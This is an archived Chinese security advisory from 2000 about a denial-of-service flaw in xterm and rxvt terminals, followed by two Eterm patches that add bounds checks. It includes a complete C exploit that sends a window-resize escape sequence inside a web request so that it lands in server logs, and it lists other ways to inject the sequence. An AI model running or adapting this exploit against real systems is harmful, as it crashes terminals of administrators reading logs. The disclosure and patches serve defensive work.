Xterm存在拒绝服务攻击漏洞
漏洞发布时间:2000-6-5 11:19:00
漏 洞 描 述:
漏洞测试程序如下:
/*
*
* xterm Denial of Service Attack
* (C) 2000 Kit Knox $#@60;kit@rootshell.com$#@62; - 5/31/2000
*
* Tested against: xterm (XFree86 3.3.3.1b(88b) -- crashes
* rxvt v2.6.1 -- consumes all available memory and then
* crashes.
*
* Not vulnerable: KDE konsole 0.9.11
* Secure CRT 3.0.x
*
*
* By sending the VT control characters to resize a window it is possible
* to cause an xterm to crash and in some cases consume all available
* memory.
*
* This itself isnt much of a problem, except that remote users can inject
* these control characters into your xterm numerous ways luding :
*
* o Directories and filenames on a rogue FTP servers.
* o Rogue banner messages on ftp, telnet, mud daemons.
* o Log files (spoofed syslog messages, web server logs, ftp server logs)
*
* This sample exploit injects these control characters into a web get
* request. If an admin were to cat this log file, or happened to be doing
* a "tail -f access_log" at the time of attack they would find their
* xterm crash.
*
* Embedding "ESCAPE[4;65535;65535t" (where escape is the escape character)
* inside files, directories, etc will have the same effect as this code.
*
*/
#include $#@60;stdio.h$#@62;
#include $#@60;netinet/in.h$#@62;
#include $#@60;sys/types.h$#@62;
#include $#@60;sys/socket.h$#@62;
#include $#@60;netdb.h$#@62;
#include $#@60;arpa/inet.h$#@62;
#include $#@60;string.h$#@62;
#include $#@60;unistd.h$#@62;
#include $#@60;stdlib.h$#@62;
int sock;
int
main (int argc, char *argv[])
{
struct hostent *he;
struct sockaddr_in sa;
char buf[1024];
char packet[1024];
int i;
fprintf(stderr, "[ http://www.rootshell.com/ ] - xterm DoS attack -
05/31/2000.\n\n");
if (argc != 2)
{
fprintf (stderr, "usage: %s $#@60;host/ip$#@62;\n", argv[0]);
return (-1);
}
sock = socket (AF_INET, SOCK_STREAM, 0);
sa.sin_family = AF_INET;
sa.sin_port = htons (80);
he = gethostbyname (argv[1]);
if (!he)
{
if ((sa.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)
return (-1);
}
else
{
bcopy (he-$#@62;h_addr, (struct in_addr *) &sa.sin_addr, he-$#@62;h_length);
}
if (connect (sock, (struct sockaddr *) &sa, sizeof (sa)) $#@60; 0)
{
fprintf (stderr,
"Fatal Error: Cant connect to web server.\n");
return (-1);
}
sprintf(packet, "GET /\033[4;65535;65535t HTTP/1.0\n\n");
write (sock, packet, strlen(packet));
close (sock);
fprintf(stderr, "Done.\n");
}
解 决 方 法:
补丁程序Eterm-0.8.10-DoS.patch:
Index: src/command.c
===================================================================
RCS file: /cvs/enlightenment/Eterm/src/command.c,v
retrieving revision 1.1.1.1.2.7
diff -u -r1.1.1.1.2.7 command.c
--- src/command.c 1999/11/02 16:34:35 1.1.1.1.2.7
+++ src/command.c 2000/06/02 02:06:56
@@ -4694,6 +4694,9 @@
return; /* Make sure there are 2 args left */
y = args[++i];
x = args[++i];
+ if (x $#@62; scr-$#@62;width || y $#@62; scr-$#@62;height) {
+ return;
+ }
XResizeWindow(Xdisplay, TermWin.parent, x, y);
break;
case 5:
@@ -4713,6 +4716,9 @@
return; /* Make sure there are 2 args left */
y = args[++i];
x = args[++i];
+ if (x $#@62; (scr-$#@62;width / TermWin.fwidth) || y $#@62; (scr-$#@62;height /
TermWin.fheight)) {
+ return;
+ }
XResizeWindow(Xdisplay, TermWin.parent,
Width2Pixel(x) + 2 * TermWin.internalBorder + (scrollbar_visible()?
scrollbar_total_width() : 0),
Height2Pixel(y) + 2 * TermWin.internalBorder + (menubar_visible()? menuBar_TotalHeight() :
0));
补丁程序Eterm-0.9-DoS.patch:
Index: src/term.c
===================================================================
RCS file: /cvs/enlightenment/Eterm/src/term.c,v
retrieving revision 1.33
diff -u -r1.33 term.c
--- src/term.c 2000/01/17 21:29:27 1.33
+++ src/term.c 2000/06/02 02:06:44
@@ -1232,6 +1232,8 @@
return; /* Make sure there are 2 args left */
y = args[++i];
x = args[++i];
+ UPPER_BOUND(y, scr-$#@62;height);
+ UPPER_BOUND(x, scr-$#@62;width);
XResizeWindow(Xdisplay, TermWin.parent, x, y);
#ifdef USE_XIM
xim_set_status_position();
@@ -1254,6 +1256,8 @@
return; /* Make sure there are 2 args left */
y = args[++i];
x = args[++i];
+ UPPER_BOUND(y, scr-$#@62;height / TermWin.fheight);
+ UPPER_BOUND(x, scr-$#@62;width / TermWin.fwidth);
XResizeWindow(Xdisplay, TermWin.parent,
Width2Pixel(x) + 2 * TermWin.internalBorder + (scrollbar_is_visible()?
scrollbar_trough_width() : 0),
Height2Pixel(y) + 2 * TermWin.internalBorder); |
    
本文出自:京九 |
|
